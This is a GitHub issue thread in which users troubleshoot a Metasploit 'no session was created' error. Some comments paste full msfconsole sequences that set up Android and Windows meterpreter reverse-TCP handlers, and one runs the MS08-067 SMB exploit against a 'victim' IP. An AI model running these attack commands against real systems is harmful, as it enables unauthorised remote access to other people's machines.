Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exploit completed but no session was created. #91

Open
amiyaraman opened this issue Feb 23, 2019 · 14 comments
Open

Exploit completed but no session was created. #91

amiyaraman opened this issue Feb 23, 2019 · 14 comments

Comments

@amiyaraman
Copy link

I am using the latest version of kali linux; i tryed following command
Msfconsole
Use exploit/multi/handler
Set payload android/meterpreter/reverse_tcp
Set lhost (my ip)
Set lport4444
Exploit -j
It gives following output
[] Exploit completed but no session was created
[
] Started reverse_tcp on Handler (my ip):4444
And after that it's jump back to
Msf5(multi/handler)
What to do now?

@GetRektBoy724
Copy link

your way is wrong. see the correct method at https://www.youtube.com/watch?v=rohijakL8WM

@Aravindhsmart
Copy link

tutorial DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)

@josedavid0511
Copy link

I have the same error! Unlike I am using the exploit:
use exploit / windows / smb / ms08_067_netapi
set rhost 192.168.0.7 // ip victim
set payload windows / meterpreter / reverse_tcp
set lhost 192.168.0.10 // attacker ip
show options
exploit

Started reverse TCP handler on 192.168.0.10:4444
[] 192.168.0.7:445 - Attempting to trigger the vulnerability ...
[
] Exploit completed, but no session was created.

the computer that I am attacking has the firewall disabled, I have also tried to set target # but the error remains the same

@veermahesh3
Copy link

your way is wrong. see the correct method at https://www.youtube.com/watch?v=rohijakL8WM

you are wrong bro he is trying to hack android not windows nonsense

@veermahesh3
Copy link

You're using the wrong payload, EternalBlue targets Windows, not Android, and as @GetRektBoy724 mentioned your method is completely wrong.
Perhaps watch a tutorial and try again?

you are wrong bro he is trying to hack android not windows nonsense

@GetRektBoy724
Copy link

yep you right @Muhammad-Daniyal-Sheikh
:)

@GetRektBoy724
Copy link

if you @therock111 think that eternalblue attack android...WHY THERE IS NO ANDROID THAT INFECTED WANNACRY?????!!!!!!!!! hahahahahhahahahahahahhahahah

@HLau85
Copy link

HLau85 commented Jan 29, 2020

check your 'ufw' status. seeing that you're using port 4444, you will have to allow port 4444 through your firewall.

@CyborgInfinix
Copy link

i have the same error here
but im using a different payload windows/shell/bind_tcp
and LPORT=1234

@Nasir222222
Copy link

if you @therock111 think that eternalblue attack android...WHY THERE IS NO ANDROID THAT INFECTED WANNACRY?????!!!!!!!!! hahahahahhahahahahahahhahahah

@Nasir222222
Copy link

Am also having the same problem please how can i solve it

@GetRektBoy724
Copy link

Fr, this issue is just so utterly stupid, im not going to even help anymore. The payload you're choosing is wrong, EternalBlue vulnerability does not exist on android since it doesnt have SMB feature in the first place, and you're being denial.

@GetRektBoy724
Copy link

i have the same error here
but im using a different payload windows/shell/bind_tcp
and LPORT=1234

Can you elaborate more about what you did?
And why did you pick bind shell in the first place instead of reverse shell?

@Israelwinner
Copy link

your way is wrong. see the correct method at https://www.youtube.com/watch?v=rohijakL8WM

HEY man the video was removed
how can i watch it

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants